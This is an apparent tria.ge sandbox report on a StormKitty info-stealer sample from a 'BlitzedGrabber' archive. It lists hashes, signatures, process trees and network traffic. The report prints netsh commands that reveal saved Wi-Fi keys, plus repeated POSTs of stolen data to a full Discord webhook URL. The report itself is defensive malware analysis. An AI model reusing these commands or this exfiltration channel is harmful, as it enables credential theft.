Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

BlitzedGrabberV12.rar

windows7-x64

10

BlitzedGrabberV12.rar

windows10-2004-x64

3

BlitzedGra...12.exe

windows7-x64

10

BlitzedGra...12.exe

windows10-2004-x64

10

BlitzedGra...ME.txt

windows7-x64

1

BlitzedGra...ME.txt

windows10-2004-x64

1

BlitzedGra...OR.dll

windows7-x64

1

BlitzedGra...OR.dll

windows10-2004-x64

1

BlitzedGra...to.dll

windows7-x64

1

BlitzedGra...to.dll

windows10-2004-x64

1

BlitzedGra...on.dll

windows7-x64

1

BlitzedGra...on.dll

windows10-2004-x64

1

BlitzedGra...le.exe

windows7-x64

3

BlitzedGra...le.exe

windows10-2004-x64

3

BlitzedGra...ww.exe

windows7-x64

10

BlitzedGra...ww.exe

windows10-2004-x64

10

BlitzedGra...y5.exe

windows7-x64

10

BlitzedGra...y5.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    436s
  • max time network
    441s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/05/2024, 17:25 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    BlitzedGrabberV12/Resources/yhyty5.exe

  • Size

    59KB

  • MD5

    9b1283f4b90fa0009ea6fda13596a584

  • SHA1

    1daa7ccfddc6da823c2fadb7b821a9e26efebabe

  • SHA256

    4e3ff2595fc8b32fb44856e856b6d91600fd6a66ab556bc2437a926bf7c8fdb0

  • SHA512

    ca6d46254da5c16f80a3ee4a5d11b7203a025082e8268ba8ff343a6b705262e03c8c149e381ec038b364ebecb8a5ab4169e6e5fb3676d90abe37aecf468d1ecb

  • SSDEEP

    768:uvlq4ltFkHOCROyDZSCY6LaIdB4b2iuAPGdX3oI0fZOv11cEL6N9Q5WEpGl:I84l4XROyDL3AEo41BLg9Qg6y

Score
10/10
stormkittyspywarestealer

Malware Config

Signatures

  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\BlitzedGrabberV12\Resources\yhyty5.exe
    "C:\Users\Admin\AppData\Local\Temp\BlitzedGrabberV12\Resources\yhyty5.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2140
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1320
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:2960
        • C:\Windows\system32\netsh.exe
          netsh wlan show profile
          3⤵
            PID:1012
          • C:\Windows\system32\findstr.exe
            findstr All
            3⤵
              PID:2544
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show profile name=65001 key=clear | findstr Key
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4000
            • C:\Windows\system32\chcp.com
              chcp 65001
              3⤵
                PID:3140
              • C:\Windows\system32\netsh.exe
                netsh wlan show profile name=65001 key=clear
                3⤵
                  PID:4596
                • C:\Windows\system32\findstr.exe
                  findstr Key
                  3⤵
                    PID:2100

              Network

              • flag-us
                DNS
                228.249.119.40.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                228.249.119.40.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                172.210.232.199.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                172.210.232.199.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                api.anonfiles.com
                yhyty5.exe
                Remote address:
                8.8.8.8:53
                Request
                api.anonfiles.com
                IN A
                Response
              • flag-us
                DNS
                discord.com
                yhyty5.exe
                Remote address:
                8.8.8.8:53
                Request
                discord.com
                IN A
                Response
                discord.com
                IN A
                162.159.136.232
                discord.com
                IN A
                162.159.137.232
                discord.com
                IN A
                162.159.128.233
                discord.com
                IN A
                162.159.135.232
                discord.com
                IN A
                162.159.138.232
              • flag-us
                POST
                https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna
                yhyty5.exe
                Remote address:
                162.159.136.232:443
                Request
                POST /api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna HTTP/1.1
                Content-Type: multipart/form-data; boundary="4485b9fa-3702-4913-b4fd-e7f1a0633c0d"
                Host: discord.com
                Content-Length: 184
                Expect: 100-continue
                Connection: Keep-Alive
                Response
                HTTP/1.1 404 Not Found
                Date: Sun, 05 May 2024 17:27:06 GMT
                Content-Type: application/json
                Content-Length: 45
                Connection: keep-alive
                set-cookie: __dcfduid=b21bff640b0411ef8d4c7a68abf1e1c0; Expires=Fri, 04-May-2029 17:27:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                x-ratelimit-limit: 5
                x-ratelimit-remaining: 3
                x-ratelimit-reset: 1714930028
                x-ratelimit-reset-after: 1
                via: 1.1 google
                alt-svc: h3=":443"; ma=86400
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBmrt9B9Q5V9iu1JCS6smHb%2FXD%2BCffRjXBtAwkwmD40lyhYXEnXqbrCo%2BBmTMJBki3fe%2BMQfeKupszMzQYl36XyN7NLvRNRxGoq0dmfwg0J5Z4sdmgvuVrHYCyRs"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                Set-Cookie: __sdcfduid=b21bff640b0411ef8d4c7a68abf1e1c00e728e38df9ec6ee295d85097c74145c6a5249dc845f5a82a5923e9b2bff4570; Expires=Fri, 04-May-2029 17:27:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                Set-Cookie: __cfruid=b07806c3fc5874a07dabfb679aec46f1194abbc1-1714930026; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                Set-Cookie: _cfuvid=pVpuamaPmODqUt0zMw9otWiMmOzCQMXxVac.08qxzkQ-1714930026819-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                Server: cloudflare
                CF-RAY: 87f2707a1d0994e5-LHR
              • flag-us
                DNS
                69.31.126.40.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                69.31.126.40.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                95.221.229.192.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                95.221.229.192.in-addr.arpa
                IN PTR
                Response
              • flag-us
                POST
                https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna
                yhyty5.exe
                Remote address:
                162.159.136.232:443
                Request
                POST /api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna HTTP/1.1
                Content-Type: multipart/form-data; boundary="8319d677-239a-4f2b-9974-9e71a474b5dd"
                Host: discord.com
                Content-Length: 190
                Expect: 100-continue
                Response
                HTTP/1.1 404 Not Found
                Date: Sun, 05 May 2024 17:27:07 GMT
                Content-Type: application/json
                Content-Length: 45
                Connection: keep-alive
                set-cookie: __dcfduid=b28aec300b0411ef8fb4862707142480; Expires=Fri, 04-May-2029 17:27:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                x-ratelimit-limit: 5
                x-ratelimit-remaining: 4
                x-ratelimit-reset: 1714930028
                x-ratelimit-reset-after: 1
                via: 1.1 google
                alt-svc: h3=":443"; ma=86400
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FMQmEHPQ6Ix8UytP7w48pjQKNS3%2B8wTqNOCjsCWxUK1%2FZ8UgNpUubtyaghlalQJf2iLIpwItbMoPnXHlJsQCSNXa%2FsLJEytGhYsFnfG6ObmLWxI3bAVa5JryNPUV"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                Set-Cookie: __sdcfduid=b28aec300b0411ef8fb48627071424805b19606086e3e24250863ba38d20e5fd4d0eb067fd968bcb27061a74bd07cad2; Expires=Fri, 04-May-2029 17:27:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                Set-Cookie: __cfruid=b652c2cb531cc49e0748ee28aaf53d0e1e76045c-1714930027; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                Set-Cookie: _cfuvid=Csd.TLg2y97w7BUZsLJsXmfnvDJ3ejS1bL0KGMfIGms-1714930027553-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                Server: cloudflare
                CF-RAY: 87f2707e6ff376c6-LHR
              • flag-us
                DNS
                232.136.159.162.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                232.136.159.162.in-addr.arpa
                IN PTR
                Response
              • flag-us
                POST
                https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna
                yhyty5.exe
                Remote address:
                162.159.136.232:443
                Request
                POST /api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna HTTP/1.1
                Content-Type: multipart/form-data; boundary="b34aac3a-b218-4f8a-9190-ad8b6980411a"
                Host: discord.com
                Content-Length: 83603
                Expect: 100-continue
                Response
                HTTP/1.1 404 Not Found
                Date: Sun, 05 May 2024 17:27:09 GMT
                Content-Type: application/json
                Content-Length: 45
                Connection: keep-alive
                set-cookie: __dcfduid=b36d3a860b0411ef9e526a6e51ca1ba9; Expires=Fri, 04-May-2029 17:27:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                x-ratelimit-limit: 5
                x-ratelimit-remaining: 1
                x-ratelimit-reset: 1714930031
                x-ratelimit-reset-after: 2
                via: 1.1 google
                alt-svc: h3=":443"; ma=86400
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6DomkIePpGZ9xN3orkenBp5PTpKfFCzoeKDn3Gr1Kmum8fGw0594IZkvIq2fqiSkDleMqN33L9cl1jJA%2FpwzTC3Gyp6WUPr0dBT1ehX%2FuR53SI7y%2FGMWuX8aYSx2"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                Set-Cookie: __sdcfduid=b36d3a860b0411ef9e526a6e51ca1ba997370d15598158666daefef1e36c51ab710143eafb70652f2e7ab68a8152b82c; Expires=Fri, 04-May-2029 17:27:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                Set-Cookie: __cfruid=04c81bb8906c9a1a65c6daf0755e4f214aac0a1c-1714930029; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                Set-Cookie: _cfuvid=mtI0ZztPB.epURNB.MiD_b3pKITtHcaDRy_ehD9IWfA-1714930029032-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                Server: cloudflare
                CF-RAY: 87f27087ea2c77ac-LHR
              • flag-us
                POST
                https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna
                yhyty5.exe
                Remote address:
                162.159.136.232:443
                Request
                POST /api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna HTTP/1.1
                Content-Type: application/json; charset=utf-8
                Host: discord.com
                Content-Length: 1697
                Expect: 100-continue
                Response
                HTTP/1.1 404 Not Found
                Date: Sun, 05 May 2024 17:27:09 GMT
                Content-Type: application/json
                Content-Length: 45
                Connection: keep-alive
                set-cookie: __dcfduid=b3a5623a0b0411ef8f129aa54c010af6; Expires=Fri, 04-May-2029 17:27:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                x-ratelimit-limit: 5
                x-ratelimit-remaining: 1
                x-ratelimit-reset: 1714930031
                x-ratelimit-reset-after: 2
                via: 1.1 google
                alt-svc: h3=":443"; ma=86400
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jh9NAE%2B1ShdE1LfjPFP9L%2Bbb8LXOEPbRMe8YmWydF%2BMhg26jJDmEgu5flwLAG4JkkdWqcKWvVuZeaeYZspz7sJjrZAQ%2BbNNcHxzRhmnPX%2BIjSPmD%2FQz5is182sQl"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                Set-Cookie: __sdcfduid=b3a5623a0b0411ef8f129aa54c010af657a5db5956bb13f1f5c73939b7283f14ef6656a897da103a3b3cdb7b1543ae08; Expires=Fri, 04-May-2029 17:27:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                Set-Cookie: __cfruid=04c81bb8906c9a1a65c6daf0755e4f214aac0a1c-1714930029; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                Set-Cookie: _cfuvid=nchSI96sQ_DXc3bsE0CG5fWFv6MWaI.WO2T7wWny0xU-1714930029398-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                Server: cloudflare
                CF-RAY: 87f2708ac9ec6325-LHR
              • flag-us
                DNS
                86.23.85.13.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                86.23.85.13.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                171.39.242.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                171.39.242.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                17.14.97.104.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                17.14.97.104.in-addr.arpa
                IN PTR
                Response
                17.14.97.104.in-addr.arpa
                IN PTR
                a104-97-14-17deploystaticakamaitechnologiescom
              • flag-us
                DNS
                0.205.248.87.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                0.205.248.87.in-addr.arpa
                IN PTR
                Response
                0.205.248.87.in-addr.arpa
                IN PTR
                https-87-248-205-0lgwllnwnet
              • flag-us
                DNS
                26.35.223.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                26.35.223.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                tse1.mm.bing.net
                Remote address:
                8.8.8.8:53
                Request
                tse1.mm.bing.net
                IN A
                Response
                tse1.mm.bing.net
                IN CNAME
                mm-mm.bing.net.trafficmanager.net
                mm-mm.bing.net.trafficmanager.net
                IN CNAME
                dual-a-0001.a-msedge.net
                dual-a-0001.a-msedge.net
                IN A
                204.79.197.200
                dual-a-0001.a-msedge.net
                IN A
                13.107.21.200
              • flag-us
                GET
                https://tse1.mm.bing.net/th?id=OADD2.10239351692215_1UJ4FAL91XLA7HB15&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                Remote address:
                204.79.197.200:443
                Request
                GET /th?id=OADD2.10239351692215_1UJ4FAL91XLA7HB15&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                host: tse1.mm.bing.net
                accept: */*
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-length: 468637
                content-type: image/jpeg
                x-cache: TCP_HIT
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: BE5C8E78D5DE445D8F65C4BF8920CC48 Ref B: LON04EDGE1110 Ref C: 2024-05-05T17:28:08Z
                date: Sun, 05 May 2024 17:28:08 GMT
              • flag-us
                GET
                https://tse1.mm.bing.net/th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                Remote address:
                204.79.197.200:443
                Request
                GET /th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                host: tse1.mm.bing.net
                accept: */*
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-length: 555746
                content-type: image/jpeg
                x-cache: TCP_HIT
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: 6FE464FA5EA2459A96075C63C52CDAE9 Ref B: LON04EDGE1110 Ref C: 2024-05-05T17:28:08Z
                date: Sun, 05 May 2024 17:28:08 GMT
              • flag-us
                GET
                https://tse1.mm.bing.net/th?id=OADD2.10239351692210_1AKNUXTAY2T0XUMCR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                Remote address:
                204.79.197.200:443
                Request
                GET /th?id=OADD2.10239351692210_1AKNUXTAY2T0XUMCR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                host: tse1.mm.bing.net
                accept: */*
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-length: 638730
                content-type: image/jpeg
                x-cache: TCP_HIT
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: 0088002D17D445F8A124635CD618B932 Ref B: LON04EDGE1110 Ref C: 2024-05-05T17:28:08Z
                date: Sun, 05 May 2024 17:28:08 GMT
              • flag-us
                GET
                https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                Remote address:
                204.79.197.200:443
                Request
                GET /th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                host: tse1.mm.bing.net
                accept: */*
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-length: 449656
                content-type: image/jpeg
                x-cache: TCP_HIT
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: 5B9DC93D066F467FB27B69139E316201 Ref B: LON04EDGE1110 Ref C: 2024-05-05T17:28:08Z
                date: Sun, 05 May 2024 17:28:08 GMT
              • flag-us
                DNS
                48.229.111.52.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                48.229.111.52.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                g.bing.com
                Remote address:
                8.8.8.8:53
                Request
                g.bing.com
                IN A
                Response
                g.bing.com
                IN CNAME
                g-bing-com.dual-a-0034.a-msedge.net
                g-bing-com.dual-a-0034.a-msedge.net
                IN CNAME
                dual-a-0034.a-msedge.net
                dual-a-0034.a-msedge.net
                IN A
                204.79.197.237
                dual-a-0034.a-msedge.net
                IN A
                13.107.21.237
              • flag-us
                GET
                https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8JGopjgBKI_AlLsA_m6_v3DVUCUzzjikhhGNC_0pOdJuzFZ3_emrOP9JHyUyFbDaJFO6X8PG_R3kdsCi5zfuL5vdYiCxME1FG-CQeOMvlu5A1nhQkhVdGawfapmeCk-CYbSaGXBEb8X6SvNPjCUAptPosCAUyeiQyFxJFI29R_BHFRV5v%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D01f67c91b8671d428aba1aba1eb47290&TIME=20240505T172733Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
                Remote address:
                204.79.197.237:443
                Request
                GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8JGopjgBKI_AlLsA_m6_v3DVUCUzzjikhhGNC_0pOdJuzFZ3_emrOP9JHyUyFbDaJFO6X8PG_R3kdsCi5zfuL5vdYiCxME1FG-CQeOMvlu5A1nhQkhVdGawfapmeCk-CYbSaGXBEb8X6SvNPjCUAptPosCAUyeiQyFxJFI29R_BHFRV5v%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D01f67c91b8671d428aba1aba1eb47290&TIME=20240505T172733Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4 HTTP/2.0
                host: g.bing.com
                accept-encoding: gzip, deflate
                user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                Response
                HTTP/2.0 204
                cache-control: no-cache, must-revalidate
                pragma: no-cache
                expires: Fri, 01 Jan 1990 00:00:00 GMT
                set-cookie: MUID=2D0F2031F60E6E140AF23447F7296FFE; domain=.bing.com; expires=Fri, 30-May-2025 17:28:40 GMT; path=/; SameSite=None; Secure; Priority=High;
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                access-control-allow-origin: *
                x-cache: CONFIG_NOCACHE
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: AE83041B237E405390E64C9F080DAEC6 Ref B: LON04EDGE0717 Ref C: 2024-05-05T17:28:40Z
                date: Sun, 05 May 2024 17:28:39 GMT
              • flag-us
                GET
                https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8JGopjgBKI_AlLsA_m6_v3DVUCUzzjikhhGNC_0pOdJuzFZ3_emrOP9JHyUyFbDaJFO6X8PG_R3kdsCi5zfuL5vdYiCxME1FG-CQeOMvlu5A1nhQkhVdGawfapmeCk-CYbSaGXBEb8X6SvNPjCUAptPosCAUyeiQyFxJFI29R_BHFRV5v%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D01f67c91b8671d428aba1aba1eb47290&TIME=20240505T172733Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
                Remote address:
                204.79.197.237:443
                Request
                GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8JGopjgBKI_AlLsA_m6_v3DVUCUzzjikhhGNC_0pOdJuzFZ3_emrOP9JHyUyFbDaJFO6X8PG_R3kdsCi5zfuL5vdYiCxME1FG-CQeOMvlu5A1nhQkhVdGawfapmeCk-CYbSaGXBEb8X6SvNPjCUAptPosCAUyeiQyFxJFI29R_BHFRV5v%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D01f67c91b8671d428aba1aba1eb47290&TIME=20240505T172733Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4 HTTP/2.0
                host: g.bing.com
                accept-encoding: gzip, deflate
                user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                cookie: MUID=2D0F2031F60E6E140AF23447F7296FFE; _EDGE_S=SID=165254AF97566138146C40D996FC605F
                Response
                HTTP/2.0 204
                cache-control: no-cache, must-revalidate
                pragma: no-cache
                expires: Fri, 01 Jan 1990 00:00:00 GMT
                set-cookie: MSPTC=KuA8Y97t_HnAMpU4D1AkOM1nkERHn4FGM5aMx7OrbiQ; domain=.bing.com; expires=Fri, 30-May-2025 17:28:41 GMT; path=/; Partitioned; secure; SameSite=None
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                access-control-allow-origin: *
                x-cache: CONFIG_NOCACHE
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
